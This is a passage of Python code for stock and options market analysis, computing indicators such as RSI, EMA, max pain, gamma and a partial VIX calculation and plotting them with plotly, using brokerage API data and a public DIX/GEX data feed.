rdf['symbol'] = rdf_pull['symbol']\n rdf['date'] = rdf['datetime'].apply(lambda x: datetime.datetime.utcfromtimestamp(x/1000).strftime('%Y-%m-%d %H:%M:%S'))\n rdf['change'] = rdf['close'] - rdf['open']\n rdf['spread'] = rdf['high'] - rdf['low']\n\n rdf['lag_change'] = rdf['change'].shift()\n rdf['change_diff'] = rdf['change'] - rdf['lag_change']\n rdf['spread_diff'] = rdf['spread'].diff()\n\n rdf['neg_change'] = rdf['change'].apply(lambda x : x<0).astype('int')\n rdf['pos_change'] = rdf['change'].apply(lambda x : x>=0).astype('int')\n\n rdf['consec_neg'] 
= rolling_consecutives(rdf['neg_change'].values)\n rdf['consec_pos'] = rolling_consecutives(rdf['pos_change'].values)\n\n rdf['close_diff'] = rdf['close'].diff()\n rdf['pos_close_diff'] = rdf['close_diff'].apply(lambda x : max(x,0))\n rdf['neg_close_diff'] = rdf['close_diff'].apply(lambda x : abs(min(x,0)))\n\n\n if rsi_method == 'wilders':\n rdf['AvgU'] = calc_avgUD_ws(rdf['pos_close_diff'])\n rdf['AvgD'] = calc_avgUD_ws(rdf['neg_close_diff'])\n else:\n rdf['AvgU'] = calc_avgUD(rdf['pos_close_diff'])\n rdf['AvgD'] = calc_avgUD(rdf['neg_close_diff'])\n\n rdf['RS'] = rdf['AvgU']/rdf['AvgD']\n rdf['RSI'] = rdf['RS'].apply(lambda x: rsi_calc(x))\n rdf = rdf.drop(['close_diff', 'pos_close_diff', 'neg_close_diff', 'AvgU', 'AvgD', 'RS'],axis=1)\n\n return rdf\n\ndef graph_rsi(gdf, rsi_name='RSI', overbought=70, underbought=30):\n\n fig = go.Figure()\n\n fig.add_shape(\n # Line Horizontal\n type=\"line\",\n x0=0,\n y0=overbought,\n x1=400,\n y1=overbought,\n line=dict(\n color=\"red\",\n width=1.5,\n ))\n\n fig.add_shape(\n # Line Horizontal\n type=\"line\",\n x0=0,\n y0=underbought,\n x1=400,\n y1=underbought,\n line=dict(\n color=\"red\",\n width=1.5,\n ))\n\n actual_line = go.Scatter(\n x=gdf.index.values,\n y=gdf[rsi_name],\n mode='lines+markers',\n opacity=0.7,\n fill='tonexty',\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n }\n )\n\n fig.add_trace(actual_line)\n\n fig.update_layout({'xaxis':{'title': 'minute'},\n 'yaxis':{'title': 'RSI', 'range':[0,100]},\n 'height':300,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef plot_candles(df):\n# https://plotly.com/python/candlestick-charts/\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n candles = go.Candlestick(x=df['date'],\n open=df['open'],\n high=df['high'],\n low=df['low'],\n close=df['close'],\n name=df.at[0,'symbol'])\n\n fig.add_trace(candles,secondary_y = False)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['volume'],\n marker_color='blue',\n opacity=0.5,\n name='Volume'\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef ema(input_df_, n, xname='close', extra_name = '', return_df=True):\n\n df_ = input_df_.copy()\n sma_col = '{x}{n}day_SMA'.format(n=n, x=extra_name)\n ema_col = '{x}{n}day_EMA'.format(n=n, x=extra_name)\n\n df_[sma_col] = df_[xname].rolling(window=n).mean()\n\n m = (2/ (n+1))\n\n prev_ema = df_[sma_col].dropna().values[0]\n nnans = df_.loc[df_[sma_col].isna()].shape[0]\n\n ema_list = [np.nan]*nnans + [prev_ema]\n\n cdf = df_[[xname, sma_col]].dropna().reset_index(drop=True)\n\n for i in range(1, cdf.shape[0]):\n\n close = cdf.at[i,xname]\n curr_ema = ((close-prev_ema) * m) + prev_ema\n ema_list.append(curr_ema)\n prev_ema = curr_ema\n\n if return_df == True:\n df_[ema_col] = ema_list\n return df_\n\n return ema_list\n\n\ndef graph_options_volume(tda_api, symbol, date, stack_bars=False):\n\n df_ = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':date, 'toDate':date})\n df_['bid_ask_spread'] = abs(df_['bid'] - df_['ask'])\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n colormap = {'PUT':'red', 'CALL':'green'}\n\n for tn in df_['putCall'].unique():\n gdf = df_.loc[df_['putCall']==tn]\n\n 
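# For each option type (PUT/CALL), draw the bid-ask spread as a line on the primary axis, then open interest and total volume as bars on the secondary axis.\n 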
actual_line = go.Scatter(\n x=gdf['strikePrice'],\n y=gdf['bid_ask_spread'],\n text=gdf['strikePrice'],\n mode='lines+markers',\n line=dict(color=colormap[tn]),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name=(tn),\n )\n\n fig.add_trace(actual_line,secondary_y = False)\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['openInterest'],\n marker_color=colormap[tn],\n opacity=0.5,\n name='Open Interest {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['totalVolume'],\n marker_color=colormap[tn],\n opacity=0.3,\n name='Volume {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n\n if stack_bars == 'True':\n fig.update_layout(barmode='stack')\n\n fig.update_layout({'xaxis':{'title': 'Strike Price'},# 'range':[200,330]},\n 'yaxis':{'title': 'Bid-Ask Spread'},\n 'yaxis2' : {'title':'Volume'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n fig.update_layout(title='Options for {sym} with ExpDate {d}'.format(sym=symbol, d=date), title_y = 0.95, title_x=0.5, title_font_size=30)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef itm_calc(putcall, strike, und_price):\n\n if putcall == 'PUT':\n if und_price < strike:\n return True\n return False\n else:\n if und_price < strike:\n return False\n return True\n\ndef max_pain_calc(putcall, strike, und_price, open_int):\n\n if putcall == 'PUT':\n mp = ((strike - und_price) * open_int) * 100\n if putcall == 'CALL':\n mp = ((und_price - strike) * open_int) * 100\n return mp\n\n\ndef calc_max_pain_graph(df_, min_range=0, max_range=420):\n\n df_2 = pd.concat([df_]*(max_range-min_range))\n plist = []\n plen = df_.shape[0]\n for i in range(min_range, max_range):\n p = list(np.ones(plen)*i)\n plist += p\n\n df_2['und_price'] = plist\n\n df_2['ITM'] = df_2.apply(lambda row: itm_calc(row['putCall'], row['strikePrice'], row['und_price']),axis=1)\n df_3 = df_2.loc[df_2['ITM']==True]\n df_3['max_pain_value'] = df_3.apply(lambda row: max_pain_calc(row['putCall'], row['strikePrice'], row['und_price'], row['openInterest']),axis=1)\n df_4 = df_3.groupby(['und_price', 'putCall']).sum().sort_values(by='max_pain_value').reset_index()[['putCall','und_price', 'max_pain_value']]\n rdf = df_4\n return rdf\n\ndef graph_max_pain(tda_api, symbol, date):#, minrange, maxrange):\n\n curr_unix = time.time()\n curr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\n dayofweek = curr_dt.weekday()\n\n while dayofweek not in [0,1,2,3,4]:\n curr_unix -= 86400\n curr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\n dayofweek = curr_dt.weekday()\n\n last_trading_day = datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d')\n# print(last_trading_day)\n payload = {'frequency':1, 'frequencyType':'daily', 'needExtendedHoursData':'false'}\n payload['periodType']='month'\n\n sdfpull = tda_api.get_price_history(symbol, payload)\n sdf = pd.DataFrame(sdfpull['candles'])\n\n # hl2 = round(((max(0,int(sdf['low'].min()))) + (int(sdf['high'].max()*1.01)))/2)\n minrange=max(0,int(sdf['low'].min()*0.99))\n maxrange=int(sdf['high'].max()*1.01)\n # minrange = hl2 - 250\n # maxrange = hl2 + 250\n\n\n temp_df = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':date, 
'toDate':date})\n\n plotdf = calc_max_pain_graph(temp_df, min_range=minrange, max_range=maxrange)\n\n fig = go.Figure()\n\n colormap = {'PUT':'red', 'CALL':'green'}\n\n for tn in plotdf['putCall'].unique():\n gdf = plotdf.loc[plotdf['putCall']==tn]\n\n bar_graph = go.Bar(\n x = gdf['und_price'],\n y = gdf['max_pain_value'],\n marker_color=colormap[tn],\n opacity=0.5,\n name=str(tn)\n )\n\n fig.add_trace(bar_graph)\n\n\n fig.update_layout({'xaxis':{'title': 'Underlying Price'},# 'range':[200,330]},\n 'yaxis':{'title': 'Writer Loss'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n\n mp = plotdf.groupby('und_price').sum().sort_values(by='max_pain_value').reset_index().at[0,'und_price']\n\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n fig.update_layout(title='Max Pain for {sym} {exp} --> {mp}'.format(mp=mp, sym=symbol, exp=date), title_y = 0.95, title_x=0.5, title_font_size=30)\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\n\ndef graph_gamma(tda_api, symbol, date, volume_cutoff=100, pclimit=1000):\n\n df_ = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':date, 'toDate':date})\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n plot_df = df_#.loc[(tdf['strikePrice']>=250) & (tdf['strikePrice']<=310)]# & (tdf['totalVolume']>500)]\n plot_df = plot_df.loc[plot_df['totalVolume']>=volume_cutoff]\n plot_df2 = plot_df.loc[(plot_df['percentChange']<=pclimit) & (plot_df['percentChange']>=(-1*pclimit))]\n\n colormap = {'PUT':'red', 'CALL':'green'}\n colormap2 = {'PUT':'palevioletred', 'CALL':'lightgreen'}\n\n for tn in plot_df['putCall'].unique():\n gdf = plot_df.loc[plot_df['putCall']==tn]\n\n # Plot gamma per strike for each option type on the secondary axis\n actual_line2 = go.Scatter(\n x=gdf['strikePrice'],\n y=gdf['gamma'],\n text=gdf['strikePrice'],\n mode='lines+markers',\n line=dict(color=colormap2[tn]),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'},\n 'symbol':3\n },\n name=str(tn)+' gamma',\n )\n fig.add_trace(actual_line2,secondary_y = True)\n\n for tn in plot_df['putCall'].unique():\n gdf = plot_df2.loc[plot_df2['putCall']==tn]\n\n actual_line = go.Scatter(\n x=gdf['strikePrice'],\n y=gdf['percentChange'],\n text=gdf['strikePrice'],\n mode='lines+markers',\n line=dict(color=colormap[tn]),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name='% Change {}'.format(tn),\n )\n\n fig.add_trace(actual_line,secondary_y = False)\n\n fig.update_layout({'xaxis':{'title': 'Strike Price'},\n 'yaxis':{'title': '% Change (%)'},\n 'yaxis2' : {'title':'Gamma'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n fig.update_layout(title='% Change and Gamma for {sym} {date}'.format(sym=symbol, date=date), title_y = 1, title_x=0.5, title_font_size=30)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef plot_spx_resistance(df, resistance_lvls, plot_res=True):\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n candles = go.Candlestick(x=df['date'],\n open=df['open'],\n high=df['high'],\n low=df['low'],\n close=df['close'],\n name=df.at[0,'symbol'])\n\n fig.add_trace(candles,secondary_y = False)\n\n colors = ['red', 'orange', 'gold', 'lawngreen', 'lightseagreen', 'royalblue',\n 'blueviolet']\n clr_idx = 0\n\n xmin=df['date'].min()\n xmax=df['date'].max()\n\n if (plot_res==True) or (plot_res=='True'):\n for res in resistance_lvls:\n if (res < df['low'].min()-50) or (res > df['high'].max()+50):\n continue\n clr = colors[clr_idx%7]\n fig.add_shape(\n # Line Horizontal\n type=\"line\",\n x0=xmin,\n y0=res,\n x1=xmax,\n y1=res,\n opacity=0.5,\n name=str(res),\n line=dict(\n color=clr,\n width=2.5,\n ),\n )\n clr_idx += 1\n\n yaxis_min = df.loc[df['low']>0]['low'].min()*0.997\n yaxis_max = df['high'].max()*1.003\n\n fig.update_layout(legend_orientation=\"h\", height=1000, xaxis={'title':'date', 'type':'category'}, yaxis={'title':'Price ($)', 'range':[yaxis_min,yaxis_max]})\n fig.update_layout(legend=dict(x=-.1, y=1.2))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef get_resistance_lvls(tda_api, d1, d2, sym='$SPX.X', frequencyType='minute', frequency=1, nn=5, plot_res=True):\n\n df = get_historical_stock_data(tda_api, sym, d1, d2, frequencyType=frequencyType, frequency=frequency, ext_hours='false')\n\n\n dflows = df.loc[df['change']<=0]\n dfhighs = df.loc[df['change']>0]\n\n dlist = []\n for lows in [3, 5, 15]:\n dflows['lows'] = dflows['low'].rolling(lows).min()\n vals = dflows.groupby('lows').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['lows'].values\n cnt = dflows.groupby('lows').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['open'].values\n for i in range(nn):\n d = {'vals':vals[i], 'cnt':cnt[i]}\n dlist.append(d)\n low_df = pd.DataFrame(dlist)\n\n dlist = []\n for highs in [3, 5, 15]:\n dfhighs['highs'] = dfhighs['high'].rolling(highs).max()\n vals = dfhighs.groupby('highs').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['highs'].values\n cnt = 
dfhighs.groupby('highs').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['open'].values\n for i in range(nn):\n d = {'vals':vals[i], 'cnt':cnt[i]}\n dlist.append(d)\n high_df = pd.DataFrame(dlist)\n\n\n round_num = df['change'].apply(lambda x: abs(x)).mean() + (2*df['change'].std())\n res_df = pd.concat([high_df,low_df],ignore_index=True)\n res_df['round_val'] = res_df['vals'].apply(lambda x: math.floor(x/round_num)*round_num)\n res_vals = res_df.sort_values(by='vals').drop_duplicates(subset=['round_val'])['vals'].values\n\n spxdf = get_historical_stock_data(tda_api, sym, d1, d2,frequencyType='minute', frequency=1, ext_hours='false')\n\n g = plot_spx_resistance(spxdf, res_vals, plot_res=plot_res)\n\n return g\n\ndef pull_all_symbols(tda_api):\n\n ## Special cases\n # $SPX.X\n # $NDX.X\n # $RUT.X\n # $VIX.X\n data_pull = tda_api.get_symbols('[A-Z]*')\n df = pd.DataFrame(data_pull)\n df2 = df.T\n df3 = df2.loc[df2['exchange']!='Pink Sheet']\n\n syms = list(df3['symbol'].unique())\n for s in ['$NDX.X', '$RUT.X', '$VIX.X', '$SPX.X']:\n syms.append(s)\n\n return syms\n\ndef calc_strike_diff(k, S, putCall, round_num=1):\n\n r = None\n\n if putCall == 'PUT':\n r = S - k\n r = round(r/round_num)*round_num\n if putCall == 'CALL':\n r = k-S\n r = round(r/round_num)*round_num\n return r\n\ndef get_even_option_strike(input_df):\n\n df2 = input_df.copy()\n df2 = df2.pivot(index='strikePrice', columns='putCall', values='ask').dropna().reset_index()\n df2['pc_diff'] = abs(df2['CALL'] - df2['PUT'])\n df2['underlyingPrice'] = round(input_df.at[0,'underlyingPrice'], 2)\n df2 = df2.loc[(df2['CALL']>0) & (df2['PUT']>0)]\n df2 = df2.sort_values(by='pc_diff').reset_index(drop=True)\n\n return df2.at[0,'strikePrice']\n\ndef assemble_pc_df(input_df, lim=200, round_num=5):\n\n df = input_df.copy()\n# print(df.shape)\n even_ask_strike = get_even_option_strike(df)\n# return even_ask_strike\n\n df['strike_diff'] = df.apply(lambda row: calc_strike_diff(row['strikePrice'], row['underlyingPrice'], row['putCall'], round_num=round_num),axis=1)\n df = df.loc[(df['strike_diff']>=(lim*-1)) & (df['strike_diff']<=lim)].reset_index(drop=True)\n\n# print(df.shape)\n df2 = df.sort_values(by='totalVolume',ascending=False)\n df2 = df2[['putCall', 'strikePrice', 'mark', 'strike_diff']].copy()\n df2 = df2.drop_duplicates(subset=['putCall','strike_diff'])\n# print(df2.shape)\n\n\n df2 = df2.pivot(index='strike_diff', columns='putCall', values='mark').dropna().reset_index()\n df2['pc_diff'] = df2['CALL'] - df2['PUT']\n df2['underlyingPrice'] = round(df.at[0,'underlyingPrice']/round_num)*round_num\n df2['even_ask_strike'] = even_ask_strike\n\n return df2\n\ndef find_closest_priced_option(input_df):\n\n df = input_df.copy()\n\n und_price = df.at[0,'underlyingPrice']\n\n closest_call_list = []\n closest_put_list = []\n\n for i in range(df.shape[0]):\n\n current_call_price = df.at[i, 'CALL']\n current_put_price = df.at[i, 'PUT']\n\n temp_df = df.copy()\n temp_df['closest_call'] = abs(temp_df['CALL'] - current_put_price)\n temp_df['closest_put'] = abs(temp_df['PUT'] - current_call_price)\n\n closest_put = temp_df.sort_values(by='closest_put').reset_index(drop=True).at[0,'strike_diff']\n closest_call = temp_df.sort_values(by='closest_call').reset_index(drop=True).at[0,'strike_diff']\n\n closest_call_list.append(closest_call)\n closest_put_list.append(closest_put)\n\n df['closest_call_to_put_price'] = closest_call_list\n df['closest_put_to_call_price'] = closest_put_list\n\n df['strike_where_put_equals_this_strike_call'] = 
und_price - df['closest_put_to_call_price']\n df['strike_where_call_equals_this_strike_put'] = df['closest_call_to_put_price'] + und_price\n\n df['closest_diff'] = df['strike_where_put_equals_this_strike_call'] - df['strike_where_call_equals_this_strike_put']\n\n return df\n\n\ndef pull_spx_options(tda_api, d1, d2, sym='$SPX.X', lim=200, round_num=5):\n\n spx_df = tda_api.get_option_chain_df({'symbol':sym, 'fromDate':d1,'toDate':d2, 'range':'ALL'})\n\n final_spx_df = pd.DataFrame()\n\n for exp in spx_df['expirationDate'].unique():\n temp_df = spx_df.loc[spx_df['expirationDate']==exp].reset_index(drop=True)\n temp_df2 = assemble_pc_df(temp_df, lim=lim, round_num=round_num)\n temp_df3 = find_closest_priced_option(temp_df2)\n temp_df3['expirationDate'] = exp\n final_spx_df = pd.concat([final_spx_df, temp_df3],ignore_index=True)\n\n final_spx_df['expirationDate'] = pd.to_datetime(final_spx_df['expirationDate'], unit='ms')\n final_spx_df['expirationDate'] = final_spx_df['expirationDate'].apply(lambda x: str(x)[0:10])\n\n final_spx_df['put_strike'] = final_spx_df['underlyingPrice'] - final_spx_df['strike_diff']\n final_spx_df['call_strike'] = final_spx_df['underlyingPrice'] + final_spx_df['strike_diff']\n final_spx_df['strike_strings'] = final_spx_df.apply(lambda row: combine_strikes(row['put_strike'], row['call_strike']),axis=1)\n\n return final_spx_df\n\ndef combine_strikes(put_strike, call_strike):\n\n put_strike = str(put_strike)\n call_strike = str(call_strike)\n new_string = 'PUT STRIKE: {p} -- CALL STRIKE: {c}'.format(p=put_strike, c=call_strike)\n return new_string\n\ndef plot_SPX_options(input_df, sym, req_strikes=None):\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n df = input_df.copy()\n df = df.sort_values(by=['expirationDate', 'strike_diff'])\n\n if req_strikes!=None:\n df = df.loc[df['expirationDate'].isin(req_strikes)]\n\n for d in df['expirationDate'].unique():\n\n try:\n gdf = df.loc[df['expirationDate']==d].reset_index(drop=True)\n except:\n continue\n\n actual_line = go.Scatter(\n x=gdf['strike_diff'],\n y=gdf['pc_diff'],\n text=gdf['strike_strings'],\n mode='lines+markers',\n # line=dict(color='lime'),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name=d,\n legendgroup=d,\n )\n\n fig.add_trace(actual_line,secondary_y = False)\n\n\n fig.update_layout(legend_orientation=\"h\", height=1000, xaxis={'title':'$ Out of the Money'}, yaxis={'title':'Call Price - Put Price'}, title={'text':'{} Put Call price differences over equivalent strikes'.format(sym)})\n fig.update_layout(legend=dict(x=-.1, y=1.2))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef plot_SPX_options_3d(input_df):\n\n df = input_df.copy()\n\n fig = go.Figure()\n\n x = df['strike_diff']\n y = df['expirationDate']\n z = df['pc_diff']\n\n data=go.Scatter3d(\n x=x,\n y=y,\n z=z,\n text=df['closest_diff'],\n mode='markers',\n marker=dict(\n size=10,\n color=z,\n opacity=0.8,\n colorscale='Viridis',\n symbol='circle'\n )\n )\n\n fig.add_trace(data)\n\n # tight layout\n fig.update_layout(scene = dict(\n xaxis_title='$ Out of the Money',\n yaxis_title='Expiration Date',\n zaxis_title='Call Price - Put Price'),\n height=1000,margin=dict(l=0, r=0, b=0, t=0), showlegend=True,\n )\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef graph_options_oi(tda_api, symbol, start_date, end_date, stack_bars=False):\n\n df_ = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':start_date, 'toDate':end_date})\n df_ = 
df_.groupby(['strikePrice','putCall'],as_index=False).sum()\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n colormap = {'PUT':'red', 'CALL':'green'}\n\n for tn in df_['putCall'].unique():\n gdf = df_.loc[df_['putCall']==tn]\n\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['openInterest'],\n marker_color=colormap[tn],\n opacity=0.5,\n name='Open Interest {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = False)\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['totalVolume'],\n marker_color=colormap[tn],\n opacity=0.3,\n name='Volume {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n\n fig.update_layout({'xaxis':{'title': 'Strike Price'},# 'range':[200,330]},\n 'yaxis':{'title': 'Open Interest'},\n 'yaxis2' : {'title':'Volume'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n if stack_bars == 'True':\n fig.update_layout(barmode='stack')\n\n fig.update_layout(title='Options for {sym} from ExpDate {d1} to {d2}'.format(sym=symbol, d1=start_date, d2=end_date), title_y = 0.95, title_x=0.5, title_font_size=30)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n # fig.update_layout(barmode='stack')\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef pull_dix():\n\n r = requests.get('https://squeezemetrics.com/monitor/static/DIX.csv?_t={}'.format(round(time.time()*1000)))\n\n cols = ['date','price','dix','gex']\n r2 = r.text[20:].replace('\\r\\n', ',').split(',')\n r2 = r2[:-1]\n temp_idx = cols*int(len(r2)/4)\n ddf = pd.DataFrame(r2, index=temp_idx)\n\n\n idx_str = ''\n for i in range(int(len(r2)/4)):\n idx_str += '{i},{i},{i},{i},'.format(i=i)\n idx_str = idx_str[:-1]\n r2_idx = idx_str.split(',')\n r2_idx = [int(i) for i in r2_idx]\n\n\n ddf2 = ddf.reset_index().pivot(columns='index', index=r2_idx)\n ddf2.columns = ddf2.columns.droplevel()\n for col in ['dix', 'gex', 'price']:\n ddf2[col] = ddf2[col].astype('float')\n\n return ddf2\n\nfrom sklearn.preprocessing import MinMaxScaler\n\ndef plot_dix(min_date, dix_rolling=None, gex_rolling=None):\n\n df = pull_dix()\n\n df = df.loc[df['date']>=min_date].reset_index(drop=True)\n\n mms = MinMaxScaler((df['gex'].min(), df['gex'].max()))\n\n if gex_rolling != None:\n df['gex'] = df['gex'].rolling(gex_rolling).mean()\n if dix_rolling != None:\n df['dix'] = df['dix'].rolling(dix_rolling).mean()\n\n df['dix_scaled'] = mms.fit_transform(df['dix'].values.reshape(-1,1))\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n\n\n fig.add_trace(go.Scatter(x=df['date'], y=df['price'],\n line=dict(color=\"#63e686\", width=5),\n name='SPX'),\n secondary_y=False)\n fig.add_trace(go.Scatter(x=df['date'], y=df['dix_scaled'],\n line=dict(color=\"#2eb9ff\", width=5),\n hovertext=df['dix'],\n name='DIX'),\n secondary_y=True)\n fig.add_trace(go.Scatter(x=df['date'], y=df['gex'],\n line=dict(color=\"#ffb62e\", width=5),\n name='GEX'),\n secondary_y=True)\n\n fig.update_layout(legend_orientation=\"h\", height=1000, title={'text':'Daily DIX & GEX'},xaxis={'title':'date'}, yaxis={'title':'SPX ($)'}, yaxis2={'title':'GEX'})\n fig.update_layout(legend=dict(x=-.1, y=1.2))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\n\n################## VIX CALC CODE ##################\ndef find_closest_midpoints(input_df):\n\n df = input_df.copy()\n\n df1 = df[['putCall', 'expirationDateStr', 'strikePrice', 'mark', 'bid', 'ask']]\n\n put_df = 
df1.loc[df1['putCall']=='PUT'][['expirationDateStr', 'strikePrice', 'mark', 'bid', 'ask']]\n call_df = df1.loc[df1['putCall']=='CALL'][['expirationDateStr', 'strikePrice', 'mark', 'bid', 'ask']]\n\n put_df.columns = ['expirationDateStr', 'strikePrice', 'put_mark', 'put_bid', 'put_ask']\n call_df.columns = ['expirationDateStr', 'strikePrice', 'call_mark', 'call_bid', 'call_ask']\n\n df2 = put_df.merge(call_df, on=['expirationDateStr', 'strikePrice'])\n\n closest_df = df2.copy()\n bidask_df = df2[['expirationDateStr', 'strikePrice', 'put_bid', 'put_ask', 'call_bid', 'call_ask']].copy()\n\n closest_df['diff'] = closest_df['put_mark'] - df2['call_mark']\n closest_df['diff'] = closest_df['diff'].apply(lambda x: abs(x))\n closest_df = closest_df.loc[(closest_df['put_mark']>0) & (closest_df['call_mark']>0)]\n closest_df = closest_df.sort_values(by='diff')\n closest_df = closest_df.drop_duplicates(subset='expirationDateStr')\n\n df3 = closest_df[['expirationDateStr', 'strikePrice', 'diff']]\n df3.columns = ['expirationDateStr', 'closest_strikes', 'closest_diff']\n\n df3 = df3.sort_values(by='expirationDateStr')\n\n rdf = input_df.merge(df3, on='expirationDateStr',how='left')\n\n rdf = rdf.merge(bidask_df, on=['expirationDateStr', 'strikePrice'], how='left')\n\n return rdf\n\ndef filter_bids(input_df):\n\n df = input_df.copy()\n\n # First, filter out based on the midpoints\n df = df.sort_values(by=['expirationDateStr','putCall', 'strikePrice'])\n\n put_df = df.loc[(df['putCall']=='PUT')]\n call_df = df.loc[(df['putCall']=='CALL')]\n put_df = put_df.sort_values(by='strikePrice',ascending=False)\n call_df = call_df.sort_values(by='strikePrice')\n df = pd.concat([put_df,call_df])\n\n df['lag_bid'] = df.groupby(['expirationDateStr','putCall'])['bid'].shift()\n df['bidsum1'] = df['bid'] + df['lag_bid']\n\n put_df = df.loc[(df['putCall']=='PUT') & (df['strikePrice']<=df['closest_strikes'])]\n call_df = df.loc[(df['putCall']=='CALL') & (df['strikePrice']>=df['closest_strikes'])]\n\n put_df = put_df.sort_values(by='strikePrice',ascending=False)\n call_df = call_df.sort_values(by='strikePrice')\n\n df = pd.concat([put_df,call_df])\n\n df['bidprod'] = df.groupby(['expirationDateStr','putCall'])['bidsum1'].cumprod()\n\n # Exclude options with bids = 0\n df2 = df.loc[df['bid']>0]\n # Exclude all options after 2 0 bids in a row\n df2 = df2.loc[df2['bidprod']!=0]\n\n ## Now apply prices to each options - special case for those that are == spot price\n\n rdf1 = df2.loc[df2['strikePrice']!=df2['closest_strikes']]\n rdf11 = rdf1.loc[rdf1['putCall']=='PUT']\n rdf12 = rdf1.loc[rdf1['putCall']=='CALL']\n\n rdf2 = df2.loc[df2['strikePrice']==df2['closest_strikes']]\n\n\n rdf11['Q'] = (rdf11['put_bid'] + rdf11['put_ask'] ) / 2\n rdf12['Q'] = (rdf12['call_bid'] + rdf12['call_ask'] ) / 2\n\n rdf2['Q'] = (rdf2['call_bid'] + rdf2['call_ask'] + rdf2['put_bid'] + rdf2['put_ask'] ) / 4\n\n rdf = pd.concat([rdf11, rdf12, rdf2],ignore_index=True)\n\n # Define Minutes to exp\n rdf['mte_calc'] = rdf['dte_calc']*24*60\n rdf['T'] = rdf['mte_calc']/ 525600 # minutes in a year\n\n return rdf\n\ndef calc_VIX(input_df, r=0.00067):\n\n df = input_df.copy()\n\n df = df.loc[df['strikePrice']==df['closest_strikes']].sort_values(by=['expirationDateStr', 'putCall']).reset_index(drop=True)\n\n start_exp = df.at[0,'expirationDateStr']\n end_exp = df.at[df.shape[0]-1, 'expirationDateStr']\n\n df = df.loc[df['expirationDateStr'].isin([start_exp, end_exp])].reset_index(drop=True)\n df['baa'] = (df['bid'] + df['ask'] ) / 2\n\n # Now calc it!\n p1 = 
